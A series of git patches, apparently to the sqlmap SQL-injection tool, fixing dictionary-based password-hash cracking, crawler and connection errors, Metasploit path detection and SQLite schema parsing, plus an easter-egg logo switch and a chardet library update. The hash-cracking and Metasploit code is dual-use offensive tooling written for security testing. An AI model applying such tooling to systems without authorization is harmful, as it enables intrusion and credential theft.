update --- lib/core/common.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index 3740365de..ba923fd31 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3043,7 +3043,7 @@ def maskSensitiveData(msg): retVal = getUnicode(msg) - for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))): + for item in filter(None, map(lambda x: conf.get(x), ("hostname", "data", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))): regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item)) while extractRegexResult(regex, retVal): value = extractRegexResult(regex, retVal) From 1258b354c3b999f3d0dae6f731352910ad7b7112 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 16:09:58 +0200 Subject: [PATCH 62/92] Minor refactoring --- lib/utils/hash.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index c4a3739c9..3965efd0e 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -709,13 +709,13 @@ def dictionaryAttack(attack_dict): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] - elif hash_regex in (HASH.ORACLE): + elif hash_regex in (HASH.ORACLE,): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {'salt': hash_[6:14]}] - elif hash_regex in (HASH.CRYPT_GENERIC): + elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {'salt': hash_[0:2]}] - elif hash_regex in (HASH.WORDPRESS): + elif hash_regex in (HASH.WORDPRESS,): item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] if item and hash_ not in keys: From 
b98f84a610473365cc7f019701fb551ad0ca3e53 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 16:26:12 +0200 Subject: [PATCH 63/92] Fixes #1443 --- lib/utils/hash.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 3965efd0e..7ab48c26f 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -716,7 +716,11 @@ def dictionaryAttack(attack_dict): elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {'salt': hash_[0:2]}] elif hash_regex in (HASH.WORDPRESS,): - item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] + if ITOA64.index(hash_[3]) < 32: + item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] + else: + warnMsg = "invalid hash '%s'" % hash_ + logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) From 95ce5a4a09a3294d9673bfac4a38befc7522b1d4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 16:33:10 +0200 Subject: [PATCH 64/92] Fixes #1444 --- lib/utils/crawler.py | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index be47608e1..b76fd3df9 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -22,6 +22,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSyntaxException from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads @@ -58,12 +59,15 @@ def crawl(target): try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] - except SqlmapConnectionException, e: - errMsg = "connection exception detected (%s). 
skipping " % e + except SqlmapConnectionException, ex: + errMsg = "connection exception detected (%s). skipping " % ex errMsg += "URL '%s'" % current logger.critical(errMsg) - except httplib.InvalidURL, e: - errMsg = "invalid URL detected (%s). skipping " % e + except SqlmapSyntaxException: + errMsg = "invalid URL detected. skipping '%s'" % current + logger.critical(errMsg) + except httplib.InvalidURL, ex: + errMsg = "invalid URL detected (%s). skipping " % ex errMsg += "URL '%s'" % current logger.critical(errMsg) From 551b7e4b4566475b4c2a539746803b10b796596a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Oct 2015 13:23:01 +0200 Subject: [PATCH 65/92] Patch for an Issue #1450 --- lib/core/settings.py | 49 ++++++++++++++++++++++++++++++++++++++++++++ lib/parse/cmdline.py | 9 ++++++++ 2 files changed, 58 insertions(+) diff --git a/lib/core/settings.py b/lib/core/settings.py index c18eb57dd..3256c0fa1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -680,3 +680,52 @@ th{ font-size:10px; } """ + +NNC5ED_LOGO = """ +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMWWMMMWWMMMWWMMMMWWMMMMWWMMMWWMMMMMWMMMWWWMMMMMMMWWMMMWWMWMWWWWMMMWWWMMMWMWWWMMMMMWWMMMMM +MMNNNMMNNMMWXNNMMMWNWMMWNWMMNNNWMMMNNWMWNNNMMMMMMWNNWMMNNWNWWWWWMNNWWNNNWNNWWWNWMMNNNNMMMM +MMWWWNWNXMMNNWNNMMMNNMWNWMMWXWNXWMMNXWMNNWNNMMMMMWNWNNWXNWNWWNWWNNWMMMWWWNNWWNNWMWXWNXWMMM +MMNNMWNNNMNNNNNXWMMMNNNNMMWNNNNXNMMNNWWNNNNXWMMMMWXWMNNNNWNWMMMMWNWMWWNNWNNWWWWMWNNNNXNMMM +MMNNMMWNNWNWMMMNNWMMWWNMMMNNMMMWNNWNWWNNMMMNNWMMMWNWMMNNWWNWWNNWMWNWWNNWMWWMMMWWNNWMMWNNMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMNXXXXXXXXXXXXXXNMMMMMMMMMMMMMMMMMMWXXXXXXXXXXXXXXNMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMM00:,'',,;'...';cld0XXWMMMMMMMMWXXKxlc;'...';,,'',:O0MMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMNK,       .,;:.     .:kKXXXXXXKkc.     .:;,.       
.XXMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMM0W            ;d.      'c;,,;:,      .d;            N0MMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMM0W              K;                  'K.         .odoX0MMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMM0W            :l.          '         .cc        OOX00MMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMKX.         ':             .;           ;,       :lcN0MMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMM0l        ;.               l             ;        ;0WMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMM0X       .                 l              .       O0MMMMMMMMMMMMMMMMMM +MMMMMMMMMMMWXXXXXMMMW0d                        :                     cKNMMMXXXXXXWMMMMMMMM +MMMMMMMMMMXKl. .dKNMMNKo      .'::             '          ;:,.      lKXMMN0d.  .:KKMMMMMMM +MMMMMMMMMM0:     dxkO0OKK;  ,KMMMN    ,ko.     .   lO:    0MMMXc  ,0X00OOxO      ;KXMMMMMM +MMMMMMMMMKX.             :  kMMMMM.  oMMMWo      cWMMMO   WMMMMK  c               :0WMMMMM +MMMMMMMMM0K             .'   kMMMMx .MMMMMM0    kMMMMMM: lMMMM0.  .'              ;0WMMMMM +MMMMMMMMMXK:   ;0XXXXXXKN.    'kWMMl:MMMMMMMd  cMMMMMMMo;MMMO,     XKXXXXXXXOo,.,o0XMMMMMM +MMMMMMMMMMNXX0XXNMMMMMMM0O       ,ldlkO0OOxl.   cxOO0OOodl,       k0WMMMMMMMMXXXXXMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMWO0                                      k0KWMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMNKOooxKXXXXkoc,,.                ..                .;.,ldOXXXNMNXXXWMMMMMMMMMM +MMMMMMMMMMMWOd     :;.      .c.            oNMMWx            .o,       .;ldd:;ckKNMMMMMMMM +MMMMMMMMMMMW0:           .:d0XXOl'        'WKMMKN;        'lkXXXOo;.            l0WMMMMMMM +MMMMMMMMMMMMOx       .:d0XXWMMXXk0OO:.       0X.      .,kO0OKXMMMNXXOo;         .KXMMMMMMM +MMMMMMMMMMMM0o      ;XXNMMMMWK00kNOk0Xkx,          'dxKKkONkO0KNMMMMMNKN.       O0MMMMMMMM +MMMMMMMMMMMMXKd.  .lKXMMMMMMO0Kk0xKxXkKXX0Oo,..,lkOXX000xKxKkKO0WMMMMMM00.     
d0MMMMMMMMM +MMMMMMMMMMMMMMXXXXXXWMMMMMM0W000WO00XK0NKk;;cll:,,xKN0N0000X0OKX0MMMMMMMXXxlloOKWMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMM0WX0NK0KXKX00l;NdlollXN.x0KXKXK0KX0WX0MMMMMMMMMMNXNMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMWXXNMNXXNMN0d ;,.ccc;.c'.k0MMWKXXMWXXNMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  kKKKOOKKK: 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  WMMlNKOMMx 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  WMMdX0OMMx 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  k00000000: 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN0d::::::::::::k0MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMW00OOXMMMMMMMMMMMMMMMMMMMMMMMMMMXXXXXXXXXXXXXNMMMMMMMMMMN00O0WMMMMMMMMMMMMMMMMMMMMM +MMMMMMd;KMMK,:XMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMKlKMMMMMMMMMMXclNMWd,dMMMMMMMMMMMMMMMMMMMM +MMMMMO';NMMMxo0No:lccOM0oxdc:lNWd::;:xWNdk00loNl,';:NOc::;:kM:'oMMMXodW0c:l:oXMdokl:ckMMMM +MMMMMk''KMMNdxKo';WN''kk'dXK,'0o',dc''kl'0MMKkXK''KNMklldc',W;':MMM0xxX''xMx',W:,0Xd';MMMM +MMMMMWl,WMMW';XO,,K0',0k'dMN''K0cckx',Kk'0MMo,K0''kcd''ck,',WK;oMMMk'dWc'oXo':W:'XMx':MMMM +MMMMMMMXOO0KKWMMNOxxONMXOXMWkxNMKkxxONMMX0KK0NMM0xxOW0xxO0kOWMMKOO00NMMMKkxkKMMOOWMXxOMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM + +""" \ No newline at end of file diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 03bb1ac80..5c0dc16d7 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -17,6 +17,7 @@ from optparse import SUPPRESS_HELP from lib.core.common import checkDeprecatedOptions from lib.core.common import checkSystemEncoding +from lib.core.common import dataToStdout from lib.core.common import expandMnemonics from lib.core.common import getUnicode from lib.core.data import cmdLineOptions @@ -30,6 +31,7 @@ from lib.core.settings import BASIC_HELP_ITEMS from lib.core.settings import DUMMY_URL from 
lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH +from lib.core.settings import NNC5ED_LOGO from lib.core.settings import VERSION_STRING from lib.core.shell import autoCompletion from lib.core.shell import clearHistory @@ -780,6 +782,9 @@ def cmdLineParser(argv=None): parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) + parser.add_option("--nnc5ed", dest="nnc5ed", action="store_true", + help=SUPPRESS_HELP) # temporary hidden switch :) + parser.add_option_group(target) parser.add_option_group(request) parser.add_option_group(optimization) @@ -925,6 +930,10 @@ def cmdLineParser(argv=None): if argv[i] == "-z": expandMnemonics(argv[i + 1], parser, args) + if args.nnc5ed: + dataToStdout(NNC5ED_LOGO) + raise SystemExit + if args.dummy: args.url = args.url or DUMMY_URL From 78bbf5d63cc2aa738248fdde79e6a593328cf6f5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Oct 2015 14:17:35 +0200 Subject: [PATCH 66/92] Fixes #1451 --- lib/controller/controller.py | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index e557c6ac1..a6d689ac0 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -421,6 +421,7 @@ def start(): skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None)) + skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None)) skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True)) From 657d71119b04326b21a494ee038dc29ce3abfda9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Oct 2015 09:22:11 +0200 Subject: 
[PATCH 67/92] Fixes #1453 --- lib/utils/google.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/utils/google.py b/lib/utils/google.py index 0fec576e6..e32278972 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -97,9 +97,9 @@ class Google(object): except urllib2.HTTPError, e: try: page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code + except Exception, ex: + warnMsg = "problem occurred while trying to get " + warnMsg += "an error page information (%s)" % getSafeExString(ex) logger.critical(warnMsg) return None except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError): From eb7c18d1f8e21a27ffef5ef8e0e8af46cab23c01 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Oct 2015 09:25:14 +0200 Subject: [PATCH 68/92] Fixes #1452 --- lib/request/connect.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index b0d645264..b5f222882 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -185,7 +185,11 @@ class Connect(object): kb.pageCompress = False else: while True: - _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) + if not conn: + break + else: + _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) + if len(_) == MAX_CONNECTION_CHUNK_SIZE: warnMsg = "large response detected. 
This could take a while" singleTimeWarnMessage(warnMsg) From fd686fb691106ec9cfb30524720ac41a0da6c8f7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Oct 2015 09:43:25 +0200 Subject: [PATCH 69/92] Patch related to the #1455 --- lib/core/option.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/core/option.py b/lib/core/option.py index f51e5210c..6703ad491 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -779,6 +779,7 @@ def _setMetasploit(): kb.oldMsf = True else: msfEnvPathExists = False + conf.msfPath = path break @@ -809,7 +810,7 @@ def _setMetasploit(): for envPath in envPaths: envPath = envPath.replace(";", "") - if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")): + if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)): kb.oldMsf = False From 8bf236ce11f20a73e77a9c592b7319e0f4cc9d09 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Oct 2015 10:01:48 +0200 Subject: [PATCH 70/92] Minor patch for SQLite parsing of schemas --- lib/core/common.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index ba923fd31..1a43aaf1f 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2698,7 +2698,7 @@ def parseSqliteTableSchema(value): table = {} columns = {} - for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): + for match in re.finditer(r"(\w+)[\"'`]?\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE 
CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): columns[match.group(1)] = match.group(2) table[conf.tbl] = columns From d424d4cdc711c97baa97571c2b6b689a3ef25eba Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 11:54:28 +0200 Subject: [PATCH 71/92] Fixes #1457 --- lib/core/agent.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 556f379a9..f44c369cb 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -501,7 +501,8 @@ class Agent(object): elif fieldsMinMaxstr: fieldsToCastStr = fieldsMinMaxstr.groups()[0] elif fieldsExists: - fieldsToCastStr = fieldsSelect.groups()[0] + if fieldsSelect: + fieldsToCastStr = fieldsSelect.groups()[0] elif fieldsSelectTop: fieldsToCastStr = fieldsSelectTop.groups()[0] elif fieldsSelectRownum: From 439d0037539fca01b3b2f9ffdb4808bc5871c342 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 13:35:48 +0200 Subject: [PATCH 72/92] Adding new version of chardet --- thirdparty/chardet/__init__.py | 14 +- thirdparty/chardet/big5freq.py | 20 +- thirdparty/chardet/big5prober.py | 17 +- thirdparty/chardet/chardetect.py | 80 +++ thirdparty/chardet/chardistribution.py | 153 +++-- thirdparty/chardet/charsetgroupprober.py | 34 +- thirdparty/chardet/charsetprober.py | 16 +- thirdparty/chardet/codingstatemachine.py | 15 +- thirdparty/chardet/compat.py | 34 + thirdparty/chardet/constants.py | 8 - thirdparty/chardet/cp949prober.py | 44 ++ thirdparty/chardet/escprober.py | 37 +- thirdparty/chardet/escsm.py | 336 +++++----- thirdparty/chardet/eucjpprober.py | 41 +- thirdparty/chardet/euckrfreq.py | 2 + thirdparty/chardet/euckrprober.py | 13 +- thirdparty/chardet/euctwfreq.py | 16 +- thirdparty/chardet/euctwprober.py | 8 +- thirdparty/chardet/gb2312freq.py | 9 +- thirdparty/chardet/gb2312prober.py | 8 +- thirdparty/chardet/hebrewprober.py | 178 ++--- 
thirdparty/chardet/jisfreq.py | 16 +- thirdparty/chardet/jpcntx.py | 89 ++- thirdparty/chardet/langbulgarianmodel.py | 29 +- thirdparty/chardet/langcyrillicmodel.py | 50 +- thirdparty/chardet/langgreekmodel.py | 26 +- thirdparty/chardet/langhebrewmodel.py | 20 +- thirdparty/chardet/langhungarianmodel.py | 26 +- thirdparty/chardet/langthaimodel.py | 22 +- thirdparty/chardet/latin1prober.py | 141 ++-- thirdparty/chardet/mbcharsetprober.py | 34 +- thirdparty/chardet/mbcsgroupprober.py | 28 +- thirdparty/chardet/mbcssm.py | 814 ++++++++++++----------- thirdparty/chardet/sbcharsetprober.py | 50 +- thirdparty/chardet/sbcsgroupprober.py | 39 +- thirdparty/chardet/sjisprober.py | 46 +- thirdparty/chardet/test.py | 20 - thirdparty/chardet/universaldetector.py | 92 +-- thirdparty/chardet/utf8prober.py | 22 +- 39 files changed, 1499 insertions(+), 1148 deletions(-) create mode 100644 thirdparty/chardet/chardetect.py create mode 100644 thirdparty/chardet/compat.py create mode 100644 thirdparty/chardet/cp949prober.py delete mode 100644 thirdparty/chardet/test.py diff --git a/thirdparty/chardet/__init__.py b/thirdparty/chardet/__init__.py index 953b39942..82c2a48d2 100644 --- a/thirdparty/chardet/__init__.py +++ b/thirdparty/chardet/__init__.py @@ -3,22 +3,28 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -__version__ = "2.0.1" +__version__ = "2.3.0" +from sys import version_info + def detect(aBuf): - import universaldetector + if ((version_info < (3, 0) and isinstance(aBuf, unicode)) or + (version_info >= (3, 0) and not isinstance(aBuf, bytes))): + raise ValueError('Expected a bytes object, not a unicode object') + + from . import universaldetector u = universaldetector.UniversalDetector() u.reset() u.feed(aBuf) diff --git a/thirdparty/chardet/big5freq.py b/thirdparty/chardet/big5freq.py index c1b0f3cec..65bffc04b 100644 --- a/thirdparty/chardet/big5freq.py +++ b/thirdparty/chardet/big5freq.py @@ -1,11 +1,11 @@ ######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. -# +# # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. -# +# # Contributor(s): # Mark Pilgrim - port to Python # @@ -13,12 +13,12 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA @@ -26,18 +26,18 @@ ######################### END LICENSE BLOCK ######################### # Big5 frequency table -# by Taiwan's Mandarin Promotion Council +# by Taiwan's Mandarin Promotion Council # -# +# # 128 --> 0.42261 # 256 --> 0.57851 # 512 --> 0.74851 # 1024 --> 0.89384 # 2048 --> 0.97583 -# +# # Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98 # Random Distribution Ration = 512/(5401-512)=0.105 -# +# # Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75 @@ -45,7 +45,7 @@ BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75 #Char to FreqOrder table BIG5_TABLE_SIZE = 5376 -Big5CharToFreqOrder = ( \ +Big5CharToFreqOrder = ( 1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16 3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32 1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48 @@ -921,3 +921,5 @@ Big5CharToFreqOrder = ( \ 13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952 13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968 13968,13969,13970,13971,13972) #13973 + +# flake8: noqa diff --git a/thirdparty/chardet/big5prober.py b/thirdparty/chardet/big5prober.py index e6b52aadb..becce81e5 100644 --- a/thirdparty/chardet/big5prober.py +++ b/thirdparty/chardet/big5prober.py @@ -1,11 +1,11 @@ ######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. -# +# # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. 
-# +# # Contributor(s): # Mark Pilgrim - port to Python # @@ -13,22 +13,23 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import Big5DistributionAnalysis -from mbcssm import Big5SMModel +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import Big5DistributionAnalysis +from .mbcssm import Big5SMModel + class Big5Prober(MultiByteCharSetProber): def __init__(self): diff --git a/thirdparty/chardet/chardetect.py b/thirdparty/chardet/chardetect.py new file mode 100644 index 000000000..ffe892f25 --- /dev/null +++ b/thirdparty/chardet/chardetect.py @@ -0,0 +1,80 @@ +#!/usr/bin/env python +""" +Script which takes one or more file paths and reports on their detected +encodings + +Example:: + + % chardetect somefile someotherfile + somefile: windows-1252 with confidence 0.5 + someotherfile: ascii with confidence 1.0 + +If no paths are provided, it takes its input from stdin. 
+ +""" + +from __future__ import absolute_import, print_function, unicode_literals + +import argparse +import sys +from io import open + +from chardet import __version__ +from chardet.universaldetector import UniversalDetector + + +def description_of(lines, name='stdin'): + """ + Return a string describing the probable encoding of a file or + list of strings. + + :param lines: The lines to get the encoding of. + :type lines: Iterable of bytes + :param name: Name of file or collection of lines + :type name: str + """ + u = UniversalDetector() + for line in lines: + u.feed(line) + u.close() + result = u.result + if result['encoding']: + return '{0}: {1} with confidence {2}'.format(name, result['encoding'], + result['confidence']) + else: + return '{0}: no result'.format(name) + + +def main(argv=None): + ''' + Handles command line arguments and gets things started. + + :param argv: List of arguments, as if specified on the command-line. + If None, ``sys.argv[1:]`` is used instead. + :type argv: list of str + ''' + # Get command line arguments + parser = argparse.ArgumentParser( + description="Takes one or more file paths and reports their detected \ + encodings", + formatter_class=argparse.ArgumentDefaultsHelpFormatter, + conflict_handler='resolve') + parser.add_argument('input', + help='File whose encoding we would like to determine.', + type=argparse.FileType('rb'), nargs='*', + default=[sys.stdin]) + parser.add_argument('--version', action='version', + version='%(prog)s {0}'.format(__version__)) + args = parser.parse_args(argv) + + for f in args.input: + if f.isatty(): + print("You are running chardetect interactively. Press " + + "CTRL-D twice at the start of a blank line to signal the " + + "end of your input. 
If you want help, run chardetect " + + "--help\n", file=sys.stderr) + print(description_of(f, f.name)) + + +if __name__ == '__main__': + main() diff --git a/thirdparty/chardet/chardistribution.py b/thirdparty/chardet/chardistribution.py index 1f95fc848..4e64a00be 100644 --- a/thirdparty/chardet/chardistribution.py +++ b/thirdparty/chardet/chardistribution.py @@ -1,11 +1,11 @@ ######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. -# +# # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. -# +# # Contributor(s): # Mark Pilgrim - port to Python # @@ -13,47 +13,63 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
